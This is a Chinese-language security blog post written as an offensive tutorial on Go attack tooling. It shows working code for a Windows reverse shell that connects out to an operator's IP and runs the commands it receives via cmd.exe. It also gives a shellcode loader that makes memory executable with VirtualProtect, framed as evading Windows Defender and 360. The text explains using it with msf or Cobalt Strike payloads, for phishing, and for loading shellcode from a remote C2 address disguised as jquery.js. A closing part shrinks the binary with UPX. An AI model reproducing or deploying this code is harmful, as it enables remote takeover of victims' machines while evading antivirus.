<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="en_US">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>Golang Socket &amp; ShellcodeLoader - x51&#39;BLOG</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content="">
  
    <meta name="description" content="与其感叹路难行，不如马上出发。">
  
  
  

  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">x51&#39;BLOG</a>
    <div class="subtitle">与其感叹路难行，不如马上出发.</div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">Home</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">About</a>
        </li>
      
    </ul>
  </nav>
</header>

<article class="post">
  <div class="post-title">
    <h1 class="article-title">Golang Socket &amp; ShellcodeLoader</h1>
  </div>

  <!-- 文章目录 -->
  <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Windows-Reverse-Shell"><span class="toc-text">Windows Reverse Shell</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#补充："><span class="toc-text">补充：</span></a></li></ol></li></ol><li class="toc-item toc-level-4"><a class="toc-link" href="#ShellCodeLoader-ByPass-WD-or-360"><span class="toc-text">ShellCodeLoader ByPass WD or 360</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#如何精简binary体积？"><span class="toc-text">如何精简binary体积？</span></a></li>

  <div class="post-content">
    <p><img src="/images/pasted-51.png" alt="upload successful"> </p>
<h4 id="Windows-Reverse-Shell"><a href="#Windows-Reverse-Shell" class="headerlink" title="Windows Reverse Shell"></a>Windows Reverse Shell</h4><p>1、<code>net.Dial</code>回连：<br><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">backip := flag.String(<span class="string">"d"</span>, <span class="string">"127.0.0.1"</span>, <span class="string">"ServerIpAdddress"</span>)</span><br><span class="line">backport := flag.Int(<span class="string">"p"</span>, 1025, <span class="string">"ServerPort"</span>)</span><br><span class="line">flag.Parse()</span><br><span class="line">conn, err := net.Dial(<span class="string">"tcp"</span>, *backip+<span class="string">":"</span>+strconv.Itoa(*backport))</span><br></pre></td></tr></table></figure></p>
<p>2、接收远程命令<br><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rcmd, _ := bufio.NewReader(conn).ReadString(<span class="string">'\n'</span>)</span><br></pre></td></tr></table></figure></p>
<p>3、执行<br><figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">func <span class="keyword">Command</span>(name <span class="keyword">string</span>, arg ...<span class="keyword">string</span>) *Cmd  </span><br><span class="line">out, err := exec.<span class="keyword">Command</span>(strings.TrimSuffix(rcmd, <span class="string">"\n"</span>)).Output()</span><br></pre></td></tr></table></figure></p>
<h6 id="补充："><a href="#补充：" class="headerlink" title="补充："></a>补充：</h6><p>这样实现的一个简单的reverse shell，只能“一次性”使用。解决办法有两个：<br>1、添加一个死循环接受远端的命令<br><figure class="highlight roboconf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">for&#123;</span><br><span class="line">	....</span><br><span class="line">    ....</span><br><span class="line">    <span class="attribute">rcmd, _</span> := bufio<span class="variable">.NewReader</span>(conn)<span class="variable">.ReadString</span>('\n')</span><br><span class="line">    out, err := exec<span class="variable">.Command</span>(strings<span class="variable">.TrimSuffix</span>(rcmd, "\n"))<span class="variable">.Output</span>()</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>2、调cmd.exe<br><figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">cmd</span><span class="bash"> := exec.Command(<span class="string">"C:\\Windows\\System32\\cmd.exe"</span>)</span></span><br></pre></td></tr></table></figure></p>
<h4 id="ShellCodeLoader-ByPass-WD-or-360"><a href="#ShellCodeLoader-ByPass-WD-or-360" class="headerlink" title="ShellCodeLoader ByPass WD or 360"></a>ShellCodeLoader ByPass WD or 360</h4><p>加载功能参考：<a href="https://github.com/brimstone/go-shellcode">https://github.com/brimstone/go-shellcode</a><br>code：<br><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> procVirtualProtect = syscall.NewLazyDLL(<span class="string">"kernel32.dll"</span>).NewProc(<span class="string">"VirtualProtect"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">VirtualProtect</span><span class="params">(lpAddress unsafe.Pointer, dwSize <span class="keyword">uintptr</span>, flNewProtect <span class="keyword">uint32</span>, lpflOldProtect unsafe.Pointer)</span> <span class="title">bool</span></span> &#123;</span><br><span class="line">	ret, _, _ := procVirtualProtect.Call(</span><br><span class="line">		<span class="keyword">uintptr</span>(lpAddress),</span><br><span class="line">		<span class="keyword">uintptr</span>(dwSize),</span><br><span class="line">		<span class="keyword">uintptr</span>(flNewProtect),</span><br><span class="line">		<span class="keyword">uintptr</span>(lpflOldProtect))</span><br><span class="line">	<span class="keyword">return</span> ret &gt; <span class="number">0</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Run</span><span class="params">(sc []<span class="keyword">byte</span>)</span></span> &#123;</span><br><span class="line">	<span class="comment">// TODO need a Go safe fork</span></span><br><span class="line">	<span class="comment">// Make a function ptr</span></span><br><span class="line">	f := <span class="function"><span class="keyword">func</span><span class="params">()</span></span> &#123;&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Change permissions on f function ptr</span></span><br><span class="line">	<span class="keyword">var</span> oldfperms <span class="keyword">uint32</span></span><br><span class="line">	<span class="keyword">if</span> !VirtualProtect(unsafe.Pointer(*(**<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;f))), unsafe.Sizeof(<span class="keyword">uintptr</span>(<span class="number">0</span>)), <span class="keyword">uint32</span>(<span class="number">0x40</span>), unsafe.Pointer(&amp;oldfperms)) &#123;</span><br><span class="line">		<span class="built_in">panic</span>(<span class="string">"Call to VirtualProtect failed!"</span>)</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Override function ptr</span></span><br><span class="line">	**(**<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;f)) = *(*<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;sc))</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Change permissions on shellcode string data</span></span><br><span class="line">	<span class="keyword">var</span> oldshellcodeperms <span class="keyword">uint32</span></span><br><span class="line">	<span class="keyword">if</span> !VirtualProtect(unsafe.Pointer(*(*<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;sc))), <span class="keyword">uintptr</span>(<span class="built_in">len</span>(sc)), <span class="keyword">uint32</span>(<span class="number">0x40</span>), unsafe.Pointer(&amp;oldshellcodeperms)) &#123;</span><br><span class="line">		<span class="built_in">panic</span>(<span class="string">"Call to VirtualProtect failed!"</span>)</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Call the function ptr it</span></span><br><span class="line">	f()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>测试了三种方法：<br>1、命令行传递shellcode，shellcode可用msf生成，或cobalstrike的payload（选c），适用反弹shell（rce or webshell）<br>2、将shellcode硬编码到程序中，会弹框，编译添加参数<code>-ldflags=&quot;-H windowsgui&quot;</code>，适用钓鱼，shellcode需处理。<br>3、远程加载（命令行）：<br><code>main1.exe http://0.0.0.0/jquery.js</code>，可在程序硬编码远程C2地址，效果如下：  </p>
<p><img src="/images/pasted-52.png" alt="upload successful"><br>（缺点是添加了网络包net/http后程序体积很大）<br><figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"> D:\Tools\upx-<span class="number">3</span>.<span class="number">95</span>-win64 的目录</span><br><span class="line"></span><br><span class="line"><span class="number">11/27/2019</span>  <span class="number">03</span>:<span class="number">58</span> PM           <span class="number">531,456</span> main.exe</span><br><span class="line">               <span class="number">1</span> 个文件        <span class="number">531,456</span> 字节</span><br><span class="line">               <span class="number">0</span> 个目录 <span class="number">260,310</span>,<span class="number">085,632</span> 可用字节</span><br></pre></td></tr></table></figure></p>
<p>从测试来看方式2效率最高，也容易扩展，大小可接受，但方法3不落地。</p>
<h4 id="如何精简binary体积？"><a href="#如何精简binary体积？" class="headerlink" title="如何精简binary体积？"></a>如何精简binary体积？</h4><p>1、精简代码<br>往往一件看似美好的事物背后总是带着点缺陷，Golang的静态编译特性运行静态无依赖，但身材却略显“臃肿”，代码分析插件：<code>goweight</code>（GitHub）可以帮助我们进行分析程序体积分布比例。适度减少程序依赖项，让代码更加精小，比如在完全可以去掉任何打印功能的情况下，就可以省出一个<code>fmt</code>大小。</p>
<figure class="highlight tap"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">D:\CodeSrc\go\src\demo\sc\main&gt;goweight</span><br><span class="line">  3.5 MB runtime</span><br><span class="line">  1.4 MB reflect</span><br><span class="line"> <span class="number"> 828 </span>kB syscall</span><br><span class="line"> <span class="number"> 513 </span>kB time</span><br><span class="line"> <span class="number"> 450 </span>kB fmt</span><br><span class="line"> <span class="number"> 445 </span>kB os</span><br><span class="line"> <span class="number"> 428 </span>kB internal/reflectlite</span><br><span class="line"> <span class="number"> 285 </span>kB strconv</span><br><span class="line"> <span class="number"> 281 </span>kB strings</span><br><span class="line"> <span class="number"> 276 </span>kB internal/poll</span><br><span class="line"> <span class="number"> 230 </span>kB unicode</span><br><span class="line"> <span class="number"> 218 </span>kB math</span><br><span class="line"> <span class="number"> 166 </span>kB sync</span><br><span class="line"> <span class="number"> 160 </span>kB internal/syscall/windows</span><br><span class="line"> <span class="number"> 145 </span>kB internal/syscall/windows/registry</span><br><span class="line"> <span class="number"> 143 </span>kB io</span><br><span class="line"> <span class="number"> 118 </span>kB sort</span><br><span class="line">  <span class="number"> 50 </span>kB internal/fmtsort</span><br><span class="line">  <span class="number"> 50 </span>kB encoding/hex</span><br><span class="line">  <span class="number"> 43 </span>kB internal/cpu</span><br><span class="line">  <span class="number"> 40 </span>kB math/bits</span><br><span class="line">  <span class="number"> 27 </span>kB unicode/utf8</span><br><span class="line">  <span class="number"> 27 </span>kB errors</span><br><span class="line">  <span class="number"> 20 </span>kB sync/atomic</span><br><span class="line">  <span class="number"> 16 </span>kB internal/bytealg</span><br><span class="line">  <span class="number"> 15 </span>kB runtime/internal/atomic</span><br><span class="line">  <span class="number"> 15 </span>kB internal/testlog</span><br><span class="line">  <span class="number"> 12 </span>kB runtime/internal/sys</span><br><span class="line">  9.0 kB demo/sc/shellcode</span><br><span class="line">  8.5 kB unicode/utf16</span><br><span class="line">  5.2 kB internal/syscall/windows/sysdll</span><br><span class="line">  4.2 kB internal/race</span><br><span class="line">  2.6 kB internal/oserror</span><br><span class="line">  1.7 kB runtime/internal/math</span><br></pre></td></tr></table></figure>
<p>btw，写了一个通过http加载远程shellcode的功能，结果发现打包后体积太大，goweight分析结果：<br><figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">D:<span class="symbol">\C</span>odeSrc<span class="symbol">\g</span>o<span class="symbol">\s</span>rc<span class="symbol">\d</span>emo<span class="symbol">\s</span>c<span class="symbol">\m</span>ain&gt;goweight</span><br><span class="line">  3.9 MB net/http</span><br><span class="line">  3.5 MB runtime</span><br><span class="line">  1.7 MB crypto/tls</span><br><span class="line">  1.4 MB net</span><br></pre></td></tr></table></figure></p>
<p>从结果可以看到http的占用率太高，那么这个功能不要也罢。<br>2、<code>ldflags</code>参数去掉符号信息、调试信息<br>先看看直接编译的结果：<br><figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">x51 D:<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\m</span>ain ❯❯❯ go build main.go</span><br><span class="line">x51 D:<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\m</span>ain ❯❯❯ ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    目录: D:<span class="symbol">\C</span>odeSrc<span class="symbol">\g</span>o<span class="symbol">\s</span>rc<span class="symbol">\d</span>emo<span class="symbol">\s</span>c<span class="symbol">\m</span>ain</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">-a----       11/28/2019   7:09 PM        2141184 main.exe</span><br><span class="line">-a----       11/28/2019   7:08 PM           1929 main.go</span><br></pre></td></tr></table></figure></p>
<p>再来看添加<code>-ldflags</code>参数后的结果：<br><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">x51 D:\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\main ❯❯❯ go build -ldflags=<span class="string">"-s -w"</span> main.go</span><br><span class="line">x51 D:\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\main ❯❯❯ <span class="keyword">ls</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    目录: D:\CodeSrc\go\src\demo\sc\main</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line"><span class="params">----</span>                <span class="params">-------------</span>         <span class="params">------</span> <span class="params">----</span></span><br><span class="line">-a<span class="params">----</span>       11/28/2019   7<span class="function">:09</span> PM        1549312 main.exe</span><br><span class="line">-a<span class="params">----</span>       11/28/2019   7<span class="function">:08</span> PM           1929 main.go</span><br></pre></td></tr></table></figure></p>
<p>很明显带参数编译的体积要更小。<br>3、upx<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">D</span>:\Tools\upx-3.95-win64&gt;upx.exe</span><br><span class="line">                       Ultimate Packer <span class="keyword">for</span> eXecutables</span><br><span class="line">                          <span class="keyword">Copyright</span> (C) 1996 - 2018</span><br><span class="line">UPX 3.95w       Markus Oberhumer, Laszlo Molnar &amp; John Reiser   Aug 26th 2018</span><br><span class="line"></span><br><span class="line">Usage: upx [-123456789dlthVL] [-qvfk] [-o <span class="keyword">file</span>] <span class="keyword">file</span>..</span><br><span class="line"></span><br><span class="line">Commands:</span><br><span class="line">  -1     <span class="keyword">compress</span> faster                   -9    <span class="keyword">compress</span> better</span><br><span class="line">  -<span class="keyword">d</span>     decompress                        -<span class="keyword">l</span>    <span class="keyword">list</span> compressed <span class="keyword">file</span></span><br><span class="line">  -t     <span class="keyword">test</span> compressed <span class="keyword">file</span>              -V    <span class="keyword">display</span> <span class="keyword">version</span> number</span><br><span class="line">  -<span class="keyword">h</span>     give <span class="keyword">more</span> <span class="keyword">help</span>                    -<span class="keyword">L</span>    <span class="keyword">display</span> software license</span><br><span class="line">Options:</span><br><span class="line">  -q     be quiet                          -v    be verbose</span><br><span class="line">  -oFILE write output to '<span class="keyword">FILE</span>'</span><br><span class="line">  -f     force compression of suspicious files</span><br><span class="line">  -k     <span class="keyword">keep</span> backup files</span><br><span class="line"><span class="keyword">file</span>..   executables to (<span class="keyword">de</span>)<span class="keyword">compress</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">Type</span> 'upx --<span class="keyword">help</span>' <span class="keyword">for</span> <span class="keyword">more</span> detailed <span class="keyword">help</span>.</span><br><span class="line"></span><br><span class="line">UPX comes with ABSOLUTELY <span class="keyword">NO</span> WARRANTY; <span class="keyword">for</span> details visit https:<span class="comment">//upx.github.io</span></span><br></pre></td></tr></table></figure></p>
<p>upx压缩处理的效果还是非常不错的，我们拿上面去除调试信息的exe直接压缩：<br><figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">     <span class="keyword">File</span> <span class="built_in">size</span>         Ratio      <span class="keyword">Format</span>      <span class="keyword">Name</span></span><br><span class="line">--------------------   ------   -----------   -----------</span><br><span class="line"><span class="number">1549312</span> -&gt;    <span class="number">538624</span>   <span class="number">34.77</span>%    win64/pe     main.exe                                                                                                       Packed <span class="number">1</span> <span class="keyword">file</span>.</span><br></pre></td></tr></table></figure></p>
<p>从1.5M多压缩到500多k，nice，注意到upx有个参数“-9”，可以理解为最大程度压缩吧，对比看一下：<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">D</span>:\Tools\upx-3.95-win64&gt;upx main.exe</span><br><span class="line">                       Ultimate Packer <span class="keyword">for</span> eXecutables</span><br><span class="line">                          <span class="keyword">Copyright</span> (C) 1996 - 2018</span><br><span class="line">UPX 3.95w       Markus Oberhumer, Laszlo Molnar &amp; John Reiser   Aug 26th 2018</span><br><span class="line"></span><br><span class="line">        <span class="keyword">File</span> size         <span class="keyword">Ratio</span>      <span class="keyword">Format</span>      Name</span><br><span class="line">   --------------------   ------   -----------   -----------</span><br><span class="line">   1549312 -&gt;    538624   34.77%    win64/pe     main.exe                                                                                                       Packed 1 <span class="keyword">file</span>.</span><br><span class="line"></span><br><span class="line"><span class="keyword">D</span>:\Tools\upx-3.95-win64&gt;upx -9 main.exe</span><br><span class="line">                       Ultimate Packer <span class="keyword">for</span> eXecutables</span><br><span class="line">                          <span class="keyword">Copyright</span> (C) 1996 - 2018</span><br><span class="line">UPX 3.95w       Markus Oberhumer, Laszlo Molnar &amp; John Reiser   Aug 26th 2018</span><br><span class="line"></span><br><span class="line">        <span class="keyword">File</span> size         <span class="keyword">Ratio</span>      <span class="keyword">Format</span>      Name</span><br><span class="line">   --------------------   ------   -----------   -----------</span><br><span class="line">   1549312 -&gt;    531456   34.30%    win64/pe     main.exe                                                                                                       Packed 1 <span class="keyword">file</span>.</span><br></pre></td></tr></table></figure></p>
<p>比不带参数可以小10k左右。</p>

  </div>
  <div class="post-meta">
    <span class="post-time" style="color:#646060;font-size:13px">2019-11-26</span>
  </div>

  <div class="post-footer">
    

    <a href="#top" class="top">Back to Top</a>
  </div>
</article>

<!-- 评论插件 -->

<footer>
  2020
  <span class="author">
    x51
  </span>
</footer>


    </div>
  </body>
</html>